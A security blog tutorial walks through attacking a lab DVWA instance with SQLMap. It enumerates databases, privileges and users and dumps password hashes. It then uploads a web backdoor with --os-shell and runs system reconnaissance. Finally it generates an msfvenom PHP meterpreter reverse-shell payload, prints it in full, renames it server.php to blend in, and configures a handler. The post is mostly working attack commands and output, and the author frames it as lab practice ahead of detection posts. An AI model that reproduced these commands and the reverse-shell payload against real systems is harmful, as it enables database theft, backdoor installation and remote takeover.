A while back, I created this post on performing SQL injection manually. In this post, we take advantage of one of the most common tools used for SQL injection. In the next two posts, we will perform, log and packet analysis to detect the activity performed by SQLMap.
To take advantage of the web application, the attacker has to at least understand the basic operation of the application. For this post, we will use the Dam Vulnerable Web Application (DVWA) and its SQLi injection.
When we first access the application, we are provided with a login screen. The default credentials are username "admin" and password "password". In this example, our URL is "http://10.0.0.108/dvwa/login.php"
Once we login and navigate to the SQLi page and enter a value of "1", we get:
Now that we know that entering "1" returned some results, what would happen if we entered a single tick such as ' ? The server returns the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1
From above, we can conclude this site maybe vulnerable to SQL injection attacks. Let's run a test using SQLMap.
If we look at the URL, from the legitimate request, we see:
http://10.0.0.108/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
From above, we see two parameters. These are "id" and "submit". Let's now use these with SQLMap.
When we execute SQLMap, we get:
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" ___ __H__ ___ ___[']_____ ___ ___ {1.4.6#stable} |_ -| . ['] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 10:58:49 /2020-06-24/ [10:58:50] [INFO] testing connection to the target URL got a 302 redirect to 'http://10.0.0.108:80/dvwa/login.php'. Do you want to follow? [Y/n]n
Above we see we are being redirected back to the login page 'http://10.0.0.108:80/dvwa/login.php'. Probably would be a bit difficult for us to authenticate from the command line and get back to that page. Fortunately for us, we can use the "--cookie" argument.
Considering we loged into the application before, we can basically reuse that cookie. Alternatively, if you have another user's cookie, you may be able to authenticate with that also. Let's use the cookie.
To find the cookie to use, I "right clicked" on the page in question (remember I had logged in before), selected "Inspect" and then selected the "Console" tab. Once in the console, I executed "document.cookie". This returned a cookie of "security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0"
Now that we have the cookie, let's use it with SQLMap. Let's also use the opportunity to flush any previous session information for the current target, by using the "--flush-session".
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session ___ __H__ ___ ___["]_____ ___ ___ {1.4.6#stable} |_ -| . [.] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 11:18:19 /2020-06-24/ [11:18:20] [INFO] testing connection to the target URL [11:18:21] [INFO] checking if the target is protected by some kind of WAF/IPS [11:18:21] [INFO] testing if the target URL content is stable [11:18:21] [INFO] target URL content is stable [11:18:21] [INFO] testing if POST parameter 'id' is dynamic [11:18:22] [WARNING] POST parameter 'id' does not appear to be dynamic [11:18:22] [INFO] heuristic (basic) test shows that POST parameter 'id' might be injectable (possible DBMS: 'MySQL') [11:18:22] [INFO] heuristic (XSS) test shows that POST parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks [11:18:22] [INFO] testing for SQL injection on POST parameter 'id' it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] .... <truncated for brevity> ..... 11:20:35] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests: .... <truncated for brevity> .....
Looks like we are now able to confirm there is a vulnerability, which we may be able to take advantage of. We can see this above from the 3 lines in bold.
Now that we know this works, let's enumerate the "banner" via "--banner" argument. We will also use the "--batch" option as there is no need for user input at this time. Additionally, as it was reported above "looks like the back-end DBMS is 'MySQL'". Let's specify this via "--dbms="MySQL"
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --banner .... <truncated for brevity> ..... --- [12:12:56] [INFO] the back-end DBMS is MySQL [12:12:56] [INFO] fetching banner back-end DBMS: MySQL >= 5.0 (MariaDB fork) banner: '10.1.30-MariaDB' [12:12:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:12:57 /2020-06-24/
From above, we see the backend database is "MySQL >= 5.0 (MariaDB fork)". Specifically we see the banner "banner: '10.1.30-MariaDB'".
At this point we can hunt the internet to find vulnerabilities associated with "10.1.30-MariaDB'"
Let's continue this journey. However, before we enumerate the current user ("--current-user"), let's make an attempt to blend in. By default, the version of SQLMap I am using uses a user-agent of "sqlmap/1.4.6#stable (http://sqlmap.org)". Let's make this look like a normal browser by leveraging the "--user-agent" argument. Let's borrow a user-agents from WhatIsMyBrowser.com. Specifically, let's take the "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18" user-agent.
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --user-agent="Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18" --current-user .... <truncated for brevity> ..... --- [12:28:55] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:28:56] [INFO] fetching current user current user: 'root@localhost' [12:28:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:28:56 /2020-06-24/
Above, we see "current user: 'root@localhost'". Never a good thing to run a program as "root". Maybe this will work to our benefit later.
Ok, above it was cool that we can specify a user-agent. How about instead of specifying one, we let SQLMap just do this on its own. As we look to enumerate the current database ("--current-db"), let's also use the "--random-agent".
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --current-db .... [12:34:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu' from file '/usr/share/sqlmap/data/txt/user-agents.txt' .... <truncated for brevity> ..... --- [12:35:05] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:35:05] [INFO] fetching current database current database: 'dvwa' [12:35:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:35:05 /2020-06-24/
We see above that a user agent was selected from the file "user-agents.txt" along with "current database: 'dvwa'". Let's see what other databases might existing or that we may have access to using "--dbs"
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --dbs .... <truncated for brevity> ..... --- [12:41:28] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:41:29] [INFO] fetching database names available databases [7]: [*] dvwa [*] information_schema [*] mysql [*] nowasp [*] performance_schema [*] phpmyadmin [*] test
Above we see a list of databases available. Looks like we can have fun with some of these. However, let's stick with "dvwa" at this time. We already know that the current user is "root@localhost". Let's see if this user is also a database administrator via "--is-dba"
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --is-dba .... <truncated for brevity> ..... --- [12:45:12] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:45:12] [INFO] testing if current user is DBA [12:45:12] [INFO] fetching current user current user is DBA: True [12:45:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:45:13 /2020-06-24/
Looks like the current user is a Database Administrator. Let's validate the privileges of the various users via "--privileges".
Looks like the current user is a Database Administrator. Let's validate the privileges of the various users via "--privileges". kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --privileges .... <truncated for brevity> ..... back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:49:51] [INFO] fetching database users privileges database management system users privileges: [*] ''@'localhost' [1]: privilege: USAGE [*] 'pma'@'localhost' [1]: privilege: USAGE [*] 'root'@'127.0.0.1' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE [*] 'root'@'::1' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE [*] 'root'@'localhost' (administrator) [28]: privilege: ALTER privilege: ALTER ROUTINE privilege: CREATE privilege: CREATE ROUTINE privilege: CREATE TABLESPACE privilege: CREATE TEMPORARY TABLES privilege: CREATE USER privilege: CREATE VIEW privilege: DELETE privilege: DROP privilege: EVENT privilege: EXECUTE privilege: FILE privilege: INDEX privilege: INSERT privilege: LOCK TABLES privilege: PROCESS privilege: REFERENCES privilege: RELOAD privilege: REPLICATION CLIENT privilege: REPLICATION SLAVE privilege: SELECT privilege: SHOW DATABASES privilege: SHOW VIEW privilege: SHUTDOWN privilege: SUPER privilege: TRIGGER privilege: UPDATE [12:49:51] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:49:51 /2020-06-24/ Liking the program which has been made so far, let's now look at the roles of the various users via "--roles" kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --roles <.... truncated for brevity ..... > [12:51:48] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (X11; Linux i686; U; en)' from file '/usr/share/sqlmap/data/txt/user-agents.txt 12:52:16] [INFO] fetching database users privileges database management system users roles: [*] ''@'localhost' [1]: role: USAGE [*] 'pma'@'localhost' [1]: role: USAGE [*] 'root'@'127.0.0.1' (administrator) [28]: role: ALTER role: ALTER ROUTINE role: CREATE role: CREATE ROUTINE role: CREATE TABLESPACE role: CREATE TEMPORARY TABLES role: CREATE USER role: CREATE VIEW role: DELETE role: DROP role: EVENT role: EXECUTE role: FILE role: INDEX role: INSERT role: LOCK TABLES role: PROCESS role: REFERENCES role: RELOAD role: REPLICATION CLIENT role: REPLICATION SLAVE role: SELECT role: SHOW DATABASES role: SHOW VIEW role: SHUTDOWN role: SUPER role: TRIGGER role: UPDATE [*] 'root'@'::1' (administrator) [28]: role: ALTER role: ALTER ROUTINE role: CREATE role: CREATE ROUTINE role: CREATE TABLESPACE role: CREATE TEMPORARY TABLES role: CREATE USER role: CREATE VIEW role: DELETE role: DROP role: EVENT role: EXECUTE role: FILE role: INDEX role: INSERT role: LOCK TABLES role: PROCESS role: REFERENCES role: RELOAD role: REPLICATION CLIENT role: REPLICATION SLAVE role: SELECT role: SHOW DATABASES role: SHOW VIEW role: SHUTDOWN role: SUPER role: TRIGGER role: UPDATE [*] 'root'@'localhost' (administrator) [28]: role: ALTER role: ALTER ROUTINE role: CREATE role: CREATE ROUTINE role: CREATE TABLESPACE role: CREATE TEMPORARY TABLES role: CREATE USER role: CREATE VIEW role: DELETE role: DROP role: EVENT role: EXECUTE role: FILE role: INDEX role: INSERT role: LOCK TABLES role: PROCESS role: REFERENCES role: RELOAD role: REPLICATION CLIENT role: REPLICATION SLAVE role: SELECT role: SHOW DATABASES role: SHOW VIEW role: SHUTDOWN role: SUPER role: TRIGGER role: UPDATE [12:52:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:52:16 /2020-06-24/
With the above, we are able to infer who are the users of this system based on the query we made for privileges. However, let's confirm the users via "--users".
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent --users <... truncated for brevity ...> --- [12:59:59] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:59:59] [INFO] fetching database users database management system users [5]: [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'127.0.0.1' [*] 'root'@'::1' [*] 'root'@'localhost' [12:59:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 12:59:59 /2020-06-24/
Let's now look at grabbing the passwords via "--password". Let's also remove the "--batch" option. This allows us to now interact with SQLMap.
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --random-agent --passwords <... truncated for brevity ...> [13:04:08] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:04:09] [INFO] fetching database users password hashes do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] [13:04:27] [WARNING] no clear password(s) found database management system users password hashes: [*] pma [1]: password hash: NULL [*] root [1]: password hash: NULL [13:04:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 13:04:27 /2020-06-24/
Let's now look at the tables within the various databases.
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --tables --- [13:17:56] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:17:56] [INFO] fetching database names [13:17:56] [INFO] fetching tables for databases: 'dvwa, information_schema, mysql, nowasp, performance_schema, phpmyadmin, test' Database: dvwa [2 tables] +----------------------------------------------------+ | guestbook | | users | +----------------------------------------------------+ Database: information_schema [78 tables] +----------------------------------------------------+ | ALL_PLUGINS | | APPLICABLE_ROLES | <.... truncated for brevity .... > | STATISTICS | | TABLES | +----------------------------------------------------+ Database: mysql [34 tables] +----------------------------------------------------+ | db | | event | | user | <.... truncated for brevity .... > | time_zone_transition | | time_zone_transition_type | +----------------------------------------------------+ Database: nowasp [13 tables] +----------------------------------------------------+ | accounts | | balloon_tips | | blogs_table | <.... truncated for brevity .... > | user_poll_results | | youtubevideos | +----------------------------------------------------+ Database: performance_schema [52 tables] +----------------------------------------------------+ | accounts | | cond_instances | | events_stages_current | <.... truncated for brevity .... > | users | +----------------------------------------------------+ Database: phpmyadmin [19 tables] +----------------------------------------------------+ | pma__bookmark | | pma__central_columns | <.... truncated for brevity .... > | pma__users | +----------------------------------------------------+ [13:17:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 13:17:57 /2020-06-24/
While the information above is truncated, you can see we have basically dumped all the tables from the various databases. We can now focus on a specific table structure by executing "-D" for the specific database and "-T" for the specific table and "--column"
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa -T users --columns --- [13:29:19] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:29:19] [INFO] fetching columns for table 'users' in database 'dvwa' Database: dvwa Table: users [8 columns] +--------------+-------------+ | Column | Type | +--------------+-------------+ | password | varchar(32) | | user | varchar(15) | | avatar | varchar(70) | | failed_login | int(3) | | first_name | varchar(15) | | last_login | timestamp | | last_name | varchar(15) | | user_id | int(6) | +--------------+-------------+ [13:29:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 13:29:19 /2020-06-24/
Let's now read all records within the "users" table within the "dvwa" database via "--sql-query".
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa --sql-query="select * from users" <.... truncated for brevity ....> --- [13:33:52] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:33:52] [INFO] fetching SQL SELECT statement query output: 'select * from users' [13:33:52] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself [13:33:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns [13:33:52] [INFO] fetching current database [13:33:52] [INFO] fetching columns for table 'users' in database 'dvwa' [13:33:52] [INFO] the query with expanded column name(s) is: SELECT `password`, `user`, avatar, failed_login, first_name, last_login, last_name, user_id FROM users select * from users [5]: [*] 5f4dcc3b5aa765d61d8327deb882cf99, admin, http://localhost/DVWA/hackable/users/admin.jpg, 0, admin, 2018-02-05 01:58:15, admin, 1 [*] e99a18c428cb38d5f260853678922e03, gordonb, http://localhost/DVWA/hackable/users/gordonb.jpg, 0, Gordon, 2018-02-05 01:58:15, Brown, 2 [*] 8d3533d75ae2c3966d7e0d4fcc69216b, 1337, http://localhost/DVWA/hackable/users/1337.jpg, 0, Hack, 2018-02-05 01:58:15, Me, 3 [*] 0d107d09f5bbe40cade3de5c71e9e9b7, pablo, http://localhost/DVWA/hackable/users/pablo.jpg, 0, Pablo, 2018-02-05 01:58:15, Picasso, 4 [*] 5f4dcc3b5aa765d61d8327deb882cf99, smithy, http://localhost/DVWA/hackable/users/smithy.jpg, 0, Bob, 2018-02-05 01:58:15, Smith, 5 [13:33:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108' [*] ending @ 13:33:52 /2020-06-24/
With the information returned above, we can crack the passwords using another tool or simply copy and paste them into crackstation.net.
At this point, there are many other things for us to do, such as reading and writing of files, etc. However, let's attempt to gain access to the underlying operating system via the "--os-shell" command.
kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent -D dvwa --os-shell <.... Truncated for brevity ....> --- [13:42:17] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0 (MariaDB fork) [13:42:17] [INFO] going to use a web backdoor for command prompt [13:42:17] [INFO] fingerprinting the back-end DBMS operating system [13:42:18] [INFO] the back-end DBMS operating system is Windows which web application language does the web server support? [1] ASP (default) [2] ASPX [3] JSP [4] PHP
From above, we select "[4] PHP"
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] [13:43:20] [WARNING] unable to automatically retrieve the web server document root what do you want to use for writable directory? [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default) [2] custom location(s) [3] custom directory list file [4] brute force search > 4
Next I selected a brute force search to upload the file to grant us shell. As can be seen below, various locations are being tried and the files were ultimately uploaded.
use any additional custom directories [Enter for None]: [13:49:55] [WARNING] unable to automatically parse any web server path [13:49:55] [INFO] trying to upload the file stager on '/xampp/' via LIMIT 'LINES TERMINATED BY' method [13:49:55] [WARNING] unable to upload the file stager on '/xampp/' [13:49:55] [INFO] trying to upload the file stager on '/xampp/' via UNION method [13:49:55] [WARNING] expect junk characters inside the file as a leftover from UNION query [13:49:55] [INFO] the remote file '/xampp/tmpufnkt.php' is larger (701 B) than the local file '/tmp/sqlmaptm_zmipy4631/tmpdhp84kj_' (700B) ... [15:52:35] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method [15:52:35] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpuevkq.php [15:52:36] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpbfkst.php [15:52:36] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell>
.... above we see the "os-shell>" and "the file stager has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpuevkq.php".
Testing the shell we see:
BREAK Sets or clears extended CTRL+C checking. BCDEDIT Sets properties in boot database to control boot loading. CACLS Displays or modifies access control lists (ACLs) of files. CALL Calls one batch program from another. CD Displays the name of or changes the current directory. CHCP Displays or sets the active code page number. CHDIR Displays the name of or changes the current directory. CHKDSK Checks a disk and displays a status report. CHKNTFS Displays or modifies the checking of disk at boot time. CLS Clears the screen. CMD Starts a new instance of the Windows command interpreter. < ... truncated for brevity .... > VOL Displays a disk volume label and serial number. XCOPY Copies files and directory trees. WMIC Displays WMI information inside interactive command shell. For more information on tools see the command-line reference in the online help. --- os-shell>
Looking at the processes on the system via "wmic process list brief"
os-shell> wmic process list brief do you want to retrieve the command standard output? [Y/n/a] y command standard output: --- HandleCount Name Priority ProcessId ThreadCount WorkingSetSize 0 System Idle Process 0 0 2 8192 1974 System 8 4 99 139264 52 smss.exe 11 312 2 987136 <.... Truncated for brevity .... > 276 taskhostw.exe 8 1732 4 17592320 193 svchost.exe 8 5576 4 7356416 62 cmd.exe 8 4332 2 3862528 108 conhost.exe 8 4996 3 10129408 192 WMIC.exe 8 5076 6 11042816 157 WmiPrvSE.exe 8 6520 9 8593408 ....
Look at the user on the system.
--- os-shell> wmic useraccount do you want to retrieve the command standard output? [Y/n/a] y command standard output: --- AccountType Caption Description Disabled Domain FullName InstallDate LocalAccount Lockout Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status 512 SECURITYNIK-WIN\Administrator Built-in account for administering the computer/domain FALSE SECURITYNIK-WIN TRUE FALSE Administrator TRUE FALSE TRUE S-1-5-21-3846991316-327138358-508696823-500 1 OK 512 SECURITYNIK-WIN\DefaultAccount A user account managed by the system. TRUE SECURITYNIK-WIN TRUE FALSE DefaultAccount TRUE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-503 1 Degraded 512 SECURITYNIK-WIN\Guest Built-in account for guest access to the computer/domain TRUE SECURITYNIK-WIN TRUE FALSE Guest FALSE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-501 1 Degraded 512 SECURITYNIK-WIN\SecurityNik FALSE SECURITYNIK-WIN TRUE FALSE SecurityNik TRUE FALSE FALSE S-1-5-21-3846991316-327138358-508696823-1002 1 OK 512 SECURITYNIK-WIN\Toronto FALSE SECURITYNIK-WIN TRUE FALSE Toronto TRUE TRUE TRUE S-1-5-21-3846991316-327138358-508696823-1005 1 OK 512 SECURITYNIK-WIN\WDAGUtilityAccount A user account managed and used by the system for Windows Defender Application Guard scenarios. TRUE SECURITYNIK-WIN TRUE FALSE WDAGUtilityAccount TRUE TRUE TRUE S-1-5-21-3846991316-327138358-508696823-504 1 Degraded ---
Grab "systeminfo "
os-shell> systeminfo do you want to retrieve the command standard output? [Y/n/a] y command standard output: --- Host Name: SECURITYNIK-WIN OS Name: Microsoft Windows 10 Pro OS Version: 10.0.16299 N/A Build 16299 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation ... Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: \SECURITYNIK-WIN Hotfix(s): 2 Hotfix(s) Installed. [01]: KB4053577 [02]: KB4054517 Network Card(s): 2 NIC(s) Installed. [01]: Microsoft KM-TEST Loopback Adapter Connection Name: Npcap Loopback Adapter DHCP Enabled: Yes DHCP Server: 255.255.255.255 IP address(es) [01]: 169.254.149.255 [02]: fe80::18f0:70a4:4f2c:95ff [02]: Intel(R) PRO/1000 MT Desktop Adapter Connection Name: Ethernet 2 DHCP Enabled: Yes DHCP Server: 10.0.0.100 IP address(es) [01]: 10.0.0.108 [02]: fe80::a858:9eed:630a:53f7 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
With the information above, we can consider the additional devices in the network to pivot to.
There are other cool things we can do with "wmic" in this "os-shell". However, let's transition back to our attacking machine and use the penetration tester's favourite tool to make things more interesting.
Let's start off with "msfvenom". In my example, I redirect the output to a file call named "tmp.php"
kali@securtynik:~$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.107 LPORT=4443 --format raw --smallest > tmp.php [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder specified, outputting raw payload Payload size: 1111 bytes
If I "cat" the file "tmp.php", we see:
kali@securtynik:~$ cat tmp.php /*<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
We now have to remove the "/*" from the beginning of the file. You can simply open the file in your favourite editor to remove those two characters. For me I will use the "cut --characters" to cut out the first 2 characters and keep everything else. I then redirect that output to a file named "server.php". With that name I hope to blend in.
kali@securtynik:~$ cat tmp.php | cut --characters 3- > server.php kali@securtynik:~$ cat server.php <?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
Next we load up "msfconsole" and configure the "multi/handler"
msf5 > use multi/handler msf5 exploit(multi/handler) > set LHOST 10.0.0.107 LHOST => 10.0.0.107 msf5 exploit(multi/handler) > set LPORT 4443 LPORT => 443 msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp
Verify all is good to go.
